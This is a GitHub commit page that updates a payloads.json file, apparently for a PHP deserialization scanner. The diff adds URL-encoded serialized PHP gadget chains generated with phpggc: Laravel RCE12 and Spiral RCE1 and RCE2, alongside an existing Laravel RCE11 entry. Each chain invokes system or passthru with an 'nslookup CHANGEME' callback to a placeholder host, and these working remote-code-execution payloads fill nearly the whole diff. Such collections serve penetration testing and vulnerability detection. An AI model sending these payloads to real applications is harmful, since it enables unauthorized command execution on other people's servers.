Skip to content

Commit

Permalink
Update payloads.json
Browse files Browse the repository at this point in the history
added Laravel RCE 12 and Spiral RCE1/RCE2
  • Loading branch information
ricardojba authored Nov 26, 2022
1 parent 2a17153 commit c861944
Showing 1 changed file with 18 additions and 0 deletions.
18 changes: 18 additions & 0 deletions res/payloads.json
Original file line number Diff line number Diff line change
Expand Up @@ -125,6 +125,24 @@
"gen_with": "./phpggc Laravel/RCE11 <function> <parameter>",
"payload": "O:37:\"Symfony\\Component\\Mime\\Part\\SMimePart\":3:{s:11:\"%00*%00_headers\"%3Ba:1:{s:8:\"dispatch\"%3Bs:6:\"system\"%3B}s:6:\"inhann\"%3BO:40:\"Illuminate\\Broadcasting\\PendingBroadcast\":2:{s:5:\"event\"%3Bs:63:\"nslookup CHANGEME\"%3Bs:6:\"events\"%3BO:15:\"Faker\\Generator\":1:{s:13:\"%00*%00formatters\"%3BN%3B}}s:49:\"%00Symfony\\Component\\Mime\\Part\\AbstractPart%00headers\"%3BR:7%3B}"
},
{
"_needs_dynamic_payload_editing": false,
"name": "Laravel 5.8.35, 7.0.0, 9.3.10 (12)",
"gen_with": "./phpggc Laravel/RCE12 <function> <parameter>",
"payload": "O:30:\"Monolog\\Handler\\RollbarHandler\":2:{s:42:\"%00Monolog\\Handler\\RollbarHandler%00hasRecords\"%3Bb:1%3Bs:16:\"%00*%00rollbarLogger\"%3BO:60:\"Illuminate\\Foundation\\Support\\Providers\\RouteServiceProvider\":1:{s:6:\"%00*%00app\"%3BO:23:\"Illuminate\\View\\Factory\":1:{s:9:\"%00*%00finder\"%3BO:37:\"Symfony\\Component\\Console\\Application\":3:{s:50:\"%00Symfony\\Component\\Console\\Application%00initialized\"%3Bb:1%3Bs:47:\"%00Symfony\\Component\\Console\\Application%00commands\"%3Ba:1:{i:0%3BO:33:\"Illuminate\\Foundation\\AliasLoader\":1:{s:10:\"%00*%00aliases\"%3Ba:1:{i:0%3Bs:3:\"key\"%3B}}}s:52:\"%00Symfony\\Component\\Console\\Application%00commandLoader\"%3BO:27:\"Illuminate\\Cache\\Repository\":1:{s:8:\"%00*%00store\"%3BO:20:\"PhpOption\\LazyOption\":3:{s:28:\"%00PhpOption\\LazyOption%00option\"%3BN%3Bs:30:\"%00PhpOption\\LazyOption%00callback\"%3Bs:6:\"system\"%3Bs:31:\"%00PhpOption\\LazyOption%00arguments\"%3Ba:1:{i:0%3Bs:63:\"nslookup CHANGEME\"%3B}}}}}}}"
},
{
"_needs_dynamic_payload_editing": false,
"name": "Spiral 2.7.0 <= 2.8.13 (1)",
"gen_with": "./phpggc Spiral/RCE1 <function> <parameter>",
"payload": "O:35:\"Monolog\\Handler\\RotatingFileHandler\":4:{s:13:\"%00*%00mustRotate\"%3Bb:1%3Bs:11:\"%00*%00filename\"%3Bs:8:\"anything\"%3Bs:17:\"%00*%00filenameFormat\"%3BO:30:\"Spiral\\Reactor\\FileDeclaration\":1:{s:42:\"%00Spiral\\Reactor\\FileDeclaration%00docComment\"%3BO:20:\"PhpOption\\LazyOption\":2:{s:30:\"%00PhpOption\\LazyOption%00callback\"%3Bs:8:\"passthru\"%3Bs:31:\"%00PhpOption\\LazyOption%00arguments\"%3Ba:1:{i:0%3Bs:63:\"nslookup CHANGEME\"%3B}}}s:13:\"%00*%00dateFormat\"%3Bs:1:\"l\"%3B}"
},
{
"_needs_dynamic_payload_editing": false,
"name": "Spiral -2.8+ (2)",
"gen_with": "./phpggc Spiral/RCE2 <function> <parameter>",
"payload": "O:7:\"App\\App\":1:{s:12:\"%00*%00finalizer\"%3BO:21:\"Spiral\\Boot\\Finalizer\":1:{s:33:\"%00Spiral\\Boot\\Finalizer%00finalizers\"%3Ba:1:{i:0%3Ba:2:{i:0%3BO:20:\"PhpOption\\LazyOption\":2:{s:30:\"%00PhpOption\\LazyOption%00callback\"%3Bs:8:\"passthru\"%3Bs:31:\"%00PhpOption\\LazyOption%00arguments\"%3Ba:1:{i:0%3Bs:63:\"nslookup CHANGEME\"%3B}}i:1%3Bs:3:\"get\"%3B}}}}"
},
{
"_needs_dynamic_payload_editing": false,
"name": "Monolog 1.4.1 <= 1.6.0 1.17.2 <= 2.7.0+ (1)",
Expand Down

0 comments on commit c861944

Please sign in to comment.